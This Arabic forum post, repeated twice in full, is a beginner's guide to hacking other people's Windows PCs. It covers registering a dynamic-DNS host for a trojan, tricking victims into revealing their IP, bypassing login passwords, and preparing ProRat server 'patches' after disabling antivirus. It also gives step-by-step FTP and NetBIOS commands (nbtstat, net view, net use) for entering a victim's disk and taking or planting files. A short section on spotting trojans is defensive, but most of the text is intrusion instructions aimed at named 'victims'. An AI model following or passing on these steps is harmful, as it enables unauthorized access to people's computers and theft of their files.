بسم الله الرحمن الرحيم
.
وتدكر ان هدا جزء فقط.
ونظرا لجمال مواضيع الموقع حبيت اضع هدا الموضوع الدي وف ينفرد به هدا الموقع.
لدلك ارجو التثبيت.
اولا يجب قبل البدأ في هدا المجال يجب معرفه:
1-معرفه لغات البرمجه الاتيه: (لغه السي-لغه البايثون-التعامل مع نظام الوندوس و اللينكس-تعلم لغه الهتمل*-تعلم لغه html-تعلم الphp ) وهدا الاشياء سوف تجدها في المرفقات مع الكتاب.
نبدا معا lets play
واولا :مصطلحات هامه في الدوسdos
Msconfig
هذا الامر لادوات النظام وشاشة بدء التشغيل
مهمة الأداة المساعدة لتكوين النظام هي :
تقوم الأداة المساعدة لتكوين النظام (Msconfig.exe) بأتمتة الخطوات الروتينية لاستكشاف الأخطاء
وإصلاحها التي يتّبعها مهندسو الدعم الفني في Microsoft عند تشخيص مسائل تتعلق بتكوين Windows 98.
وتسمح لك هذه الأداة بتعديل تكوين النظام من خلال عملية حذف خانات الاختيار، وتقليل المجازفة بكتابة
أخطاء مقترنة بشكل مسبق بالمفكرة ومحرر تكوين النظام.
كما أنه بإمكان الأداة المساعدة لتكوين النظام إنشاء نسخة احتياطية عن ملفات النظام
قبل أن تبدأ جلسة العمل المخصصة لاستكشاف الأخطاء وإصلاحها.
وعليك إنشاء نسخ احتياطية عن ملفات النظام لضمان إمكانية عكس التعديلات التي تم إدخالها
أثناء جلسة العمل المخصصة لاستكشاف الأخطاء .
وسوف نستخدمه بشكل خاص بالهكر فيما يلي
Regedit
هذا الامر للوصول الى الرجستري لعمل بعض التعديلات التي تريدها
وسوف نستخدمه بشكل خاص بالهكر فيما يلي
Command
ايظا لهدا الغرضcmdهذا الامر يقوم بتشغيل شاشة الدوس كما يوجد الامر
وسوف نستخدمه بشكل خاص بالهكر فيما يلي
وثانيا:مصطلحات هامه
ip هو عنوان جهاز الضحيه كما انه برتكول
server خادم يتم ارساله للضحيه
client عميل يكون في جهاز الهاك
منفد port
scan بحث عن شئ
Administrator المدير
.
ASCII 3 قاعدة المعايير الأمريكية لتبادل المعلومات
معيار لتحويل الأحرف
إلى أرقام وتحتوي على سبعة جزيئات بقيمة ثنائية تتراوح بين الصفرو127 .
Anonymous مجهول
يتم استخدامه كاسم مستخدم للدخول على بعض الكمبيوترات البعيدة.
Authentication التوثيق
تعريف هوية شخص أو الإجراءات الخاصة بذلك.
Band Width عرض النطاق
هي كمية المعلومات التي يمكنك إرسالها على خط معين في وقت محدد
Bits per Second وتكتب
BBS لوحة إعلانات النظام
كمبيوتر مزود ببرامج معينة يوفر رسائل إلكترونية وملفات إضافة للخدمات
الأخرى.
Binary ثنائي
تستخدم0و1 وهي الوسيلة التي يعمل بها الكمبيوتر
وتحتوي الملفات الثنائية على ثمان جزئيات تتراوح بين صفر و255
Browser متصفح
برنامج يستخدم للإبحار في الشبكة العنكبوتية WWW.
Compression ضغط
Connectionربط
.
Crack تخريب
مصطلح يطلق على برنامج يقوم بفك شفرة أحد البرامج المشتركة وجعله مجاني.
Cracker مخرب
شخص يحاول الدخول على نظام ما دون تصريح ويسبب له أضرار.
Data بيانات
Default بديل افتراضي
قيمة أو فعل أو ترتيب يقوم الكمبيوتر بافتراضه في حال عدم قيام المستخدم
بإعطاء تعليمات صريحة بخلاف ذلك. هذا النظام يمنع البرنامج من التعطل أو
الاصطدام في حال عدم إعطاء قيمة بواسطة المستخدم.
Device جهاز
Dial-up اتصال
Domain حقل
هو ذلك الجزء من الـ DNS الذي يحدد مكان شبكة كمبيوترك وموقعها في العالم
DNS نظام أسماء الحقول
هو نظام لتحديد العناوين الشبكية
Electronic Mail البريد الالكتروني
Emotion رموز المشاعر
رموز تستخدم للتعبير عن المشاعر على الانترنت « ابتسامة ، غضب »
Encryption التشفير
FAQs الأسئلة المتكررة
وثيقة على الانترنت الغرض منها فحص وتدقيق
المعلومات التي يحتاج إليها الكثير من الأشخاص بصفة متكررة.
Firewall جدار نار
نظام تأمين لتقييد عملية الدخول على الكمبيوترات الموجودة على شبكة محلية
LAN من أي مكان في الخارج.
Gopher خدمة جوفر
نظام طورته جامعة مينيسوتا الأمريكية بهدف تسهييل عملية استخدام الانترنت
وهو يعتمد على عملية البحث من خلال القوائم لقراءة الوثائق ونقل الملفات.
Hacker متطفل
Host مضيف
للكمبيوتر الذي يتيح للمستخدمين
الدخول عليه.
HTTP بروتوكول نقل النص التشعبي
هي وسيلة تجعل من الممكن التصفح عبر وثائق الشبكة العنكبوتيه،
ISDN الشبكة الرقمية للخدمات الموحدة
هي تكنولوجيا جديدة تحتوي على
شبكات صوتية ورقمية في وسيلة واحدة وتعتبر خدمة اتصالات فائقة السرعة.
ISP مقدم خدمة الانترنت
JPEG
وسيلة لضغط الصور المستخدمة في الانترنت
Layer طبقة
Login تسجيل
Log off انهاء عملية التسجيل
Lurking التواري
يستخدم هذا المصطلح للتعبير عن شخص ليس لديه مشاركة نشطة في مجموعة
الاخبار او لوحة النقاش أو قائمة البريد التي اشترك معها، ويفضل التواري
للأشخاص المبتدئين الذين يريدون التأقلم في البداية مع الآخرين
Mailing List قائمة بريد
MIME توصيلة بريد الانترنت المتعددة الأغراض
نظام لتوفير القدرة على نقل
البيانات
kimoaledoo@yahoo.com************************************************** ********************************************
اولا هكر الاجهزه
كي تخترق جهاز شخص يجب توافر:
1-عنوان جهاز الضحيه ip
2-منفد مفتوح في جهاز الضحيه
اولا عنوان جهاز الضحيه ip
ويتضمنأربع خانات وهذه إحدى الأمثلة
112.0.1.255
255.45.7.1
12.245.54.1
1.24.57.13
ثانيا المنفد port
وهو حلقه الوصل بين جهازك وجهاز الضحيه
ويتم فتحه عن طريق الخادم(server)
كي تتعلم اختراق جهاز شخص يجب:
1-ان تتابع كل جديد في البرامج وتتعلمه
2-كيفيه التعامل مع برامج الهاك والبتشات
3-كيفيه الاختراق بدون باتشات
4-تعلم انشاء اي بي ثابت
5-كيفيه المحافظه علي نفسك قبل ان تخترق
6-تعلم استخراج ايبي الضحيه
اولا تعلم كيف تنشا ايبي ثابت
1-ادهب الي الموقعwww.no-ip.com
2-اشترك فيه وقم بتفعيل الرساله من البريد.
3-قم بالدخول علي الوقع مره اخري
4-اضعظ add
5-قم بادخال الايبي الثابت
6-ثم اضغط اسفل الصفحهcreat host
************************************************** **************
ثانيا كيفيه المحافظه علي نفسك
1-معرفه وجود برامج التجسس في جهازك
(1)
ثم start
RUN
اكتب
regedit
ثم اضغط على اوكى
HKEY_LOCAL_MACHINE
ثم
Software
ثم
Microsoft
ثم
Windows
ثم
CurrentVersion
ثم
Run او Run Once
وانظر الي يمين الشاشه فادا رايت في اليمبن خالص ملف ليس له اسم فهدا هو البتش
(2)
start
ثم
Run
اكتب
msconfig
اختر
Statup
وادا رايت ملف غريب عليك لم تقم يتنزيله فهو البتش
(3)
start
ثم
run
اكتب
system.ini
فادا وجدت في السطر الخامس
user.exe=user.exe
فانت اخترقت
1-انصحك حمايه نفسك بالfire wall مثل برنامج ZONE ALARM
2- استخدم النورتن +البرامج غير المعروفه وخاصه الروسيهspyware
3-استخدم الديب فريز
4-لا اتفق مع من يقولون ادكر اسمك الحقيقي في المنتديات او عندما تعلن عن عمليه اختراق ولكن يتوجب عليك التخفي لدواعي امنيه
************************************************** *****
ثالثا كيفيه استخراج ايبي الضحيه
1- ارسال ملف صوتي او فيديو للضحيه بعدين نزهب للدوس
start
run
cmd or command
netstat
فيظهر رقم لاي بي في النصف اخر واحد
تحت foreign address
2-يرسل لك رساله بالهوتميل بعدين لما توصلك روح لoptions الخاص بالهوتميل
و اخر واحده علي اليمينMail Display Settings اخترها
ونشط full بالتعليم عليها من
Message Headers
3-عن طريق برنامج
يجب في هده الطريقه توافر
1-الجدار الناري
2-برنامجURLENCODE
والطريقه كلاتي
1-استخرج رقم الايبي بتاعك
start
run
cmd or command
ipconfig
2- الان استخدم البرنامج
ضع في الخانه الاولي الايبي بتاعك
ثم اضغط encode
سوف يظهر لك في الخانه الثانيه عنوان ابعته للضحيه
واول ما يضغط عليه سوف تصل لك رساله من الجدار الناري فيها ايبي الضحيه (تقول لك هل تسمح بالدخول له)
انقلها ثم ارفض الدخول
************************************************** ***********************
*حبيت اضيف نقطه هامه ممكن تفيدك
فك كلمات سر الكمبيوتر المحمي بكلمه سر
الطريقه الأولى:
قم بإدخال ما بين القوسين [ award-sw ] بدلاً من الرقم الأصلي
ونسبة نجاحه كبيرة جداً في عملية الفتح
الطريقه الثانيه:
اخرج البطاريه من الكاسه ثم ضعها في مكانها مره اخري
>> الطريقتين الأولتين ما أتوقع فيهم جدوى بس أنا قلتهم للأمانه أما الطريقتين اللي بعد كذا ينفعوا خصوصا الطريقه الثالثه ..
(3)
اول متخش اضغط اف 8 بعدين اختار سيف مود بعدين غير جيست الي
admin
(4)
وهي اول ماتفتح الكمبيوتر راح تجيك شاشه الترحيب يقولك اضغط على الاسم وادخل الرقم السري
اوكيه
حلو لاتدخل الرقم اضغط على الت وكنترول ودليت
لما تجيك شاشه سوداء مكتوب فيها الاسم طبعا انت امسحه واكتب
مكان النيم الي هو الاسم Administrator
والباسورد الي هو الرقم السري لاتحط شي خليه فاضي اضغط انتر
اذا مارضي يدخل اكتب PASSWORD
*************************************
رابعا فن التعامل مع البتشات و برامح الهاك
1-برنامج الهكر ينقسم الي
a)edit server وده الي سيدتك هتعمل منه البتش وتبعته
b)dll ودي ملفات مع البرنامج
c)source وده الي هتتحكم منه
2-عشان تجهز البتش
-وقف برامج الحمايه
-المطاليب برنامج
stripper and superscan and prorat
)لاحظ ان هده البرامج للتدريب ومن الافضل استخدام برامج من صنعك او برامج اقل شهره)
اولا برنامجprorat
ثانيا برنامج stripper
ثالثا برنامج superscan
**********************************************
*حبيت اضيف نقطه هتفيدك بادن الله
1-http://neworder.box.sk/ الموقع ده مفيد جدا تكتب اي موقع فيه او منتدي او حتي برنامج ويعطيك ثغراته.(يتم دلك من خلال IIS او apache)
2http://www.ussrback.com الموقع ده ايضا مفيد جدا يعطيك جميع ثغرات الانظمه
(ودلك من خلالexploits علي اليسار وتختار اول واحده
3-استرجاع الايميلات المحزوفه من الماسينجر بشرط انك لم تعمل فورمات لجهازك
Start
Run
اكتب
REGEDIT
اوجد
HKEY_CURRENT_US
ERS\Software\Mi
crosoft\
MessengerServic
e\ListCache\MSN
MessengerServic
e
تجد سوف
allow, block, contact, and reverse
اختاربعد الضغط علي الزر الايمن للموس علي الخانه السابقه
.Modify
و تجد نص تكست hex
سوف تجد الايميلات في الكست.
************************************************** ***********
خامسا كيفيه الاختراق بدون باتشات
اولا نقط ضعف المانفد
1-عن طريق الftb
ما هو الفوتب؟
هو بورت مفتوح لدي الضحيه يتم من خلاله الدخول لجهاز الضحيه بطريقه غير شرعيه
وعشان تخترق بهده العمليه يجب عليك التاكد من ان هدا البورت مفنوح في حهاز الضحيه
وطبعا هنستخد الsuper scan لمعرفه دلك
الخطوات lets play!
1-start
2-run
3-ftp -n
4-write (open)
5-write (victim's ip)
-if you get this replay(Connected to www.assassin.com
220 websrv1 Microsoft FTP Service (Version 4.0(.
so you must continue
write( quote user ftp)
if you get this replay (331 Anonymous acces allowed, send identify (e-mail name) as password)
so you must contiune
write (quote cwd ~root)
if you get this replay(530 Please login with USER and PASS)
so you must contiune
write(quote pass ftp)
if you get this replay(230 Anonymous user logged in)
so you finished work
بعد ماخلصت لازم تكون عارف اوامر الftp
اوامر الفوتب:
Pwd
عشان تعرف ما يحتويه الهارد ديسك عند الضحية
Cd
مثال
Cd visacard
في هذا المثال قمت بإقتحام المجلد المسمي
visacard
Ls
لكي يتضح لك محتوى المجلد أو الهارد ديسك
Get
امر الحصول على اى ملف من جهاز الضحية الى سطح المكتب بجهازك - مثال
Get visacard (example)
Put
العكس ان تأخد ملف من سطح المكتب بجهازك و تضعه في في جهاز الضحية - مثال
Put patch (example)
Close
لقطع الإتصال مع الضحية
ثانيا نقط ضعف البرتوكلات
2-عن طريق نيتبويس(netbois) ويستخدم المنافد 137 و 138 و 139
ما هو النيت بويس؟
هو برتكول يمكن من خلاله اختراق جهاز شخص بطريقه غير شرعيه
الخطوات lets paly!
1-لازم نتاكد من ان المنافد 137 138 139 مفتوحه
لدلك هنستخدم الsuper scan
نعمل اسكان وناخد الايبي المصاب عشان نطبق غليه
2-start
3-run
4-cmd or command
5-write(nbtstat -A+victim's ip)
example : nbstat -A127.0.0.1
if victim is sharing
so you must contiune
6-write (net view\\+victim's ip)
example : net view\\127.0.0.1
if the system was'nt protected
you are finished
الان انت انتهيت من الاختراق
ولكن ينقص عليك الدخول لجهاز الضحيه
1-start
2-run
3-write (\\+victims ip)
or net use c: \+victims ip+the name of(C or D or K or L.......)
.
وتدكر ان هدا جزء فقط.
ونظرا لجمال مواضيع الموقع حبيت اضع هدا الموضوع الدي وف ينفرد به هدا الموقع.
لدلك ارجو التثبيت.
اولا يجب قبل البدأ في هدا المجال يجب معرفه:
1-معرفه لغات البرمجه الاتيه: (لغه السي-لغه البايثون-التعامل مع نظام الوندوس و اللينكس-تعلم لغه الهتمل*-تعلم لغه html-تعلم الphp ) وهدا الاشياء سوف تجدها في المرفقات مع الكتاب.
نبدا معا lets play
واولا :مصطلحات هامه في الدوسdos
Msconfig
هذا الامر لادوات النظام وشاشة بدء التشغيل
مهمة الأداة المساعدة لتكوين النظام هي :
تقوم الأداة المساعدة لتكوين النظام (Msconfig.exe) بأتمتة الخطوات الروتينية لاستكشاف الأخطاء
وإصلاحها التي يتّبعها مهندسو الدعم الفني في Microsoft عند تشخيص مسائل تتعلق بتكوين Windows 98.
وتسمح لك هذه الأداة بتعديل تكوين النظام من خلال عملية حذف خانات الاختيار، وتقليل المجازفة بكتابة
أخطاء مقترنة بشكل مسبق بالمفكرة ومحرر تكوين النظام.
كما أنه بإمكان الأداة المساعدة لتكوين النظام إنشاء نسخة احتياطية عن ملفات النظام
قبل أن تبدأ جلسة العمل المخصصة لاستكشاف الأخطاء وإصلاحها.
وعليك إنشاء نسخ احتياطية عن ملفات النظام لضمان إمكانية عكس التعديلات التي تم إدخالها
أثناء جلسة العمل المخصصة لاستكشاف الأخطاء .
وسوف نستخدمه بشكل خاص بالهكر فيما يلي
Regedit
هذا الامر للوصول الى الرجستري لعمل بعض التعديلات التي تريدها
وسوف نستخدمه بشكل خاص بالهكر فيما يلي
Command
ايظا لهدا الغرضcmdهذا الامر يقوم بتشغيل شاشة الدوس كما يوجد الامر
وسوف نستخدمه بشكل خاص بالهكر فيما يلي
وثانيا:مصطلحات هامه
ip هو عنوان جهاز الضحيه كما انه برتكول
server خادم يتم ارساله للضحيه
client عميل يكون في جهاز الهاك
منفد port
scan بحث عن شئ
Administrator المدير
.
ASCII 3 قاعدة المعايير الأمريكية لتبادل المعلومات
معيار لتحويل الأحرف
إلى أرقام وتحتوي على سبعة جزيئات بقيمة ثنائية تتراوح بين الصفرو127 .
Anonymous مجهول
يتم استخدامه كاسم مستخدم للدخول على بعض الكمبيوترات البعيدة.
Authentication التوثيق
تعريف هوية شخص أو الإجراءات الخاصة بذلك.
Band Width عرض النطاق
هي كمية المعلومات التي يمكنك إرسالها على خط معين في وقت محدد
Bits per Second وتكتب
BBS لوحة إعلانات النظام
كمبيوتر مزود ببرامج معينة يوفر رسائل إلكترونية وملفات إضافة للخدمات
الأخرى.
Binary ثنائي
تستخدم0و1 وهي الوسيلة التي يعمل بها الكمبيوتر
وتحتوي الملفات الثنائية على ثمان جزئيات تتراوح بين صفر و255
Browser متصفح
برنامج يستخدم للإبحار في الشبكة العنكبوتية WWW.
Compression ضغط
Connectionربط
.
Crack تخريب
مصطلح يطلق على برنامج يقوم بفك شفرة أحد البرامج المشتركة وجعله مجاني.
Cracker مخرب
شخص يحاول الدخول على نظام ما دون تصريح ويسبب له أضرار.
Data بيانات
Default بديل افتراضي
قيمة أو فعل أو ترتيب يقوم الكمبيوتر بافتراضه في حال عدم قيام المستخدم
بإعطاء تعليمات صريحة بخلاف ذلك. هذا النظام يمنع البرنامج من التعطل أو
الاصطدام في حال عدم إعطاء قيمة بواسطة المستخدم.
Device جهاز
Dial-up اتصال
Domain حقل
هو ذلك الجزء من الـ DNS الذي يحدد مكان شبكة كمبيوترك وموقعها في العالم
DNS نظام أسماء الحقول
هو نظام لتحديد العناوين الشبكية
Electronic Mail البريد الالكتروني
Emotion رموز المشاعر
رموز تستخدم للتعبير عن المشاعر على الانترنت « ابتسامة ، غضب »
Encryption التشفير
FAQs الأسئلة المتكررة
وثيقة على الانترنت الغرض منها فحص وتدقيق
المعلومات التي يحتاج إليها الكثير من الأشخاص بصفة متكررة.
Firewall جدار نار
نظام تأمين لتقييد عملية الدخول على الكمبيوترات الموجودة على شبكة محلية
LAN من أي مكان في الخارج.
Gopher خدمة جوفر
نظام طورته جامعة مينيسوتا الأمريكية بهدف تسهييل عملية استخدام الانترنت
وهو يعتمد على عملية البحث من خلال القوائم لقراءة الوثائق ونقل الملفات.
Hacker متطفل
Host مضيف
للكمبيوتر الذي يتيح للمستخدمين
الدخول عليه.
HTTP بروتوكول نقل النص التشعبي
هي وسيلة تجعل من الممكن التصفح عبر وثائق الشبكة العنكبوتيه،
ISDN الشبكة الرقمية للخدمات الموحدة
هي تكنولوجيا جديدة تحتوي على
شبكات صوتية ورقمية في وسيلة واحدة وتعتبر خدمة اتصالات فائقة السرعة.
ISP مقدم خدمة الانترنت
JPEG
وسيلة لضغط الصور المستخدمة في الانترنت
Layer طبقة
Login تسجيل
Log off انهاء عملية التسجيل
Lurking التواري
يستخدم هذا المصطلح للتعبير عن شخص ليس لديه مشاركة نشطة في مجموعة
الاخبار او لوحة النقاش أو قائمة البريد التي اشترك معها، ويفضل التواري
للأشخاص المبتدئين الذين يريدون التأقلم في البداية مع الآخرين
Mailing List قائمة بريد
MIME توصيلة بريد الانترنت المتعددة الأغراض
نظام لتوفير القدرة على نقل
البيانات
kimoaledoo@yahoo.com************************************************** ********************************************
اولا هكر الاجهزه
كي تخترق جهاز شخص يجب توافر:
1-عنوان جهاز الضحيه ip
2-منفد مفتوح في جهاز الضحيه
اولا عنوان جهاز الضحيه ip
ويتضمنأربع خانات وهذه إحدى الأمثلة
112.0.1.255
255.45.7.1
12.245.54.1
1.24.57.13
ثانيا المنفد port
وهو حلقه الوصل بين جهازك وجهاز الضحيه
ويتم فتحه عن طريق الخادم(server)
كي تتعلم اختراق جهاز شخص يجب:
1-ان تتابع كل جديد في البرامج وتتعلمه
2-كيفيه التعامل مع برامج الهاك والبتشات
3-كيفيه الاختراق بدون باتشات
4-تعلم انشاء اي بي ثابت
5-كيفيه المحافظه علي نفسك قبل ان تخترق
6-تعلم استخراج ايبي الضحيه
اولا تعلم كيف تنشا ايبي ثابت
1-ادهب الي الموقعwww.no-ip.com
2-اشترك فيه وقم بتفعيل الرساله من البريد.
3-قم بالدخول علي الوقع مره اخري
4-اضعظ add
5-قم بادخال الايبي الثابت
6-ثم اضغط اسفل الصفحهcreat host
************************************************** **************
ثانيا كيفيه المحافظه علي نفسك
1-معرفه وجود برامج التجسس في جهازك
(1)
ثم start
RUN
اكتب
regedit
ثم اضغط على اوكى
HKEY_LOCAL_MACHINE
ثم
Software
ثم
Microsoft
ثم
Windows
ثم
CurrentVersion
ثم
Run او Run Once
وانظر الي يمين الشاشه فادا رايت في اليمبن خالص ملف ليس له اسم فهدا هو البتش
(2)
start
ثم
Run
اكتب
msconfig
اختر
Statup
وادا رايت ملف غريب عليك لم تقم يتنزيله فهو البتش
(3)
start
ثم
run
اكتب
system.ini
فادا وجدت في السطر الخامس
user.exe=user.exe
فانت اخترقت
1-انصحك حمايه نفسك بالfire wall مثل برنامج ZONE ALARM
2- استخدم النورتن +البرامج غير المعروفه وخاصه الروسيهspyware
3-استخدم الديب فريز
4-لا اتفق مع من يقولون ادكر اسمك الحقيقي في المنتديات او عندما تعلن عن عمليه اختراق ولكن يتوجب عليك التخفي لدواعي امنيه
************************************************** *****
ثالثا كيفيه استخراج ايبي الضحيه
1- ارسال ملف صوتي او فيديو للضحيه بعدين نزهب للدوس
start
run
cmd or command
netstat
فيظهر رقم لاي بي في النصف اخر واحد
تحت foreign address
2-يرسل لك رساله بالهوتميل بعدين لما توصلك روح لoptions الخاص بالهوتميل
و اخر واحده علي اليمينMail Display Settings اخترها
ونشط full بالتعليم عليها من
Message Headers
3-عن طريق برنامج
يجب في هده الطريقه توافر
1-الجدار الناري
2-برنامجURLENCODE
والطريقه كلاتي
1-استخرج رقم الايبي بتاعك
start
run
cmd or command
ipconfig
2- الان استخدم البرنامج
ضع في الخانه الاولي الايبي بتاعك
ثم اضغط encode
سوف يظهر لك في الخانه الثانيه عنوان ابعته للضحيه
واول ما يضغط عليه سوف تصل لك رساله من الجدار الناري فيها ايبي الضحيه (تقول لك هل تسمح بالدخول له)
انقلها ثم ارفض الدخول
************************************************** ***********************
*حبيت اضيف نقطه هامه ممكن تفيدك
فك كلمات سر الكمبيوتر المحمي بكلمه سر
الطريقه الأولى:
قم بإدخال ما بين القوسين [ award-sw ] بدلاً من الرقم الأصلي
ونسبة نجاحه كبيرة جداً في عملية الفتح
الطريقه الثانيه:
اخرج البطاريه من الكاسه ثم ضعها في مكانها مره اخري
>> الطريقتين الأولتين ما أتوقع فيهم جدوى بس أنا قلتهم للأمانه أما الطريقتين اللي بعد كذا ينفعوا خصوصا الطريقه الثالثه ..
(3)
اول متخش اضغط اف 8 بعدين اختار سيف مود بعدين غير جيست الي
admin
(4)
وهي اول ماتفتح الكمبيوتر راح تجيك شاشه الترحيب يقولك اضغط على الاسم وادخل الرقم السري
اوكيه
حلو لاتدخل الرقم اضغط على الت وكنترول ودليت
لما تجيك شاشه سوداء مكتوب فيها الاسم طبعا انت امسحه واكتب
مكان النيم الي هو الاسم Administrator
والباسورد الي هو الرقم السري لاتحط شي خليه فاضي اضغط انتر
اذا مارضي يدخل اكتب PASSWORD
*************************************
رابعا فن التعامل مع البتشات و برامح الهاك
1-برنامج الهكر ينقسم الي
a)edit server وده الي سيدتك هتعمل منه البتش وتبعته
b)dll ودي ملفات مع البرنامج
c)source وده الي هتتحكم منه
2-عشان تجهز البتش
-وقف برامج الحمايه
-المطاليب برنامج
stripper and superscan and prorat
)لاحظ ان هده البرامج للتدريب ومن الافضل استخدام برامج من صنعك او برامج اقل شهره)
اولا برنامجprorat
ثانيا برنامج stripper
ثالثا برنامج superscan
**********************************************
*حبيت اضيف نقطه هتفيدك بادن الله
1-http://neworder.box.sk/ الموقع ده مفيد جدا تكتب اي موقع فيه او منتدي او حتي برنامج ويعطيك ثغراته.(يتم دلك من خلال IIS او apache)
2http://www.ussrback.com الموقع ده ايضا مفيد جدا يعطيك جميع ثغرات الانظمه
(ودلك من خلالexploits علي اليسار وتختار اول واحده
3-استرجاع الايميلات المحزوفه من الماسينجر بشرط انك لم تعمل فورمات لجهازك
Start
Run
اكتب
REGEDIT
اوجد
HKEY_CURRENT_US
ERS\Software\Mi
crosoft\
MessengerServic
e\ListCache\MSN
MessengerServic
e
تجد سوف
allow, block, contact, and reverse
اختاربعد الضغط علي الزر الايمن للموس علي الخانه السابقه
.Modify
و تجد نص تكست hex
سوف تجد الايميلات في الكست.
************************************************** ***********
خامسا كيفيه الاختراق بدون باتشات
اولا نقط ضعف المانفد
1-عن طريق الftb
ما هو الفوتب؟
هو بورت مفتوح لدي الضحيه يتم من خلاله الدخول لجهاز الضحيه بطريقه غير شرعيه
وعشان تخترق بهده العمليه يجب عليك التاكد من ان هدا البورت مفنوح في حهاز الضحيه
وطبعا هنستخد الsuper scan لمعرفه دلك
الخطوات lets play!
1-start
2-run
3-ftp -n
4-write (open)
5-write (victim's ip)
-if you get this replay(Connected to www.assassin.com
220 websrv1 Microsoft FTP Service (Version 4.0(.
so you must continue
write( quote user ftp)
if you get this replay (331 Anonymous acces allowed, send identify (e-mail name) as password)
so you must contiune
write (quote cwd ~root)
if you get this replay(530 Please login with USER and PASS)
so you must contiune
write(quote pass ftp)
if you get this replay(230 Anonymous user logged in)
so you finished work
بعد ماخلصت لازم تكون عارف اوامر الftp
اوامر الفوتب:
Pwd
عشان تعرف ما يحتويه الهارد ديسك عند الضحية
Cd
مثال
Cd visacard
في هذا المثال قمت بإقتحام المجلد المسمي
visacard
Ls
لكي يتضح لك محتوى المجلد أو الهارد ديسك
Get
امر الحصول على اى ملف من جهاز الضحية الى سطح المكتب بجهازك - مثال
Get visacard (example)
Put
العكس ان تأخد ملف من سطح المكتب بجهازك و تضعه في في جهاز الضحية - مثال
Put patch (example)
Close
لقطع الإتصال مع الضحية
ثانيا نقط ضعف البرتوكلات
2-عن طريق نيتبويس(netbois) ويستخدم المنافد 137 و 138 و 139
ما هو النيت بويس؟
هو برتكول يمكن من خلاله اختراق جهاز شخص بطريقه غير شرعيه
الخطوات lets paly!
1-لازم نتاكد من ان المنافد 137 138 139 مفتوحه
لدلك هنستخدم الsuper scan
نعمل اسكان وناخد الايبي المصاب عشان نطبق غليه
2-start
3-run
4-cmd or command
5-write(nbtstat -A+victim's ip)
example : nbstat -A127.0.0.1
if victim is sharing
so you must contiune
6-write (net view\\+victim's ip)
example : net view\\127.0.0.1
if the system was'nt protected
you are finished
الان انت انتهيت من الاختراق
ولكن ينقص عليك الدخول لجهاز الضحيه
1-start
2-run
3-write (\\+victims ip)
or net use c: \+victims ip+the name of(C or D or K or L.......)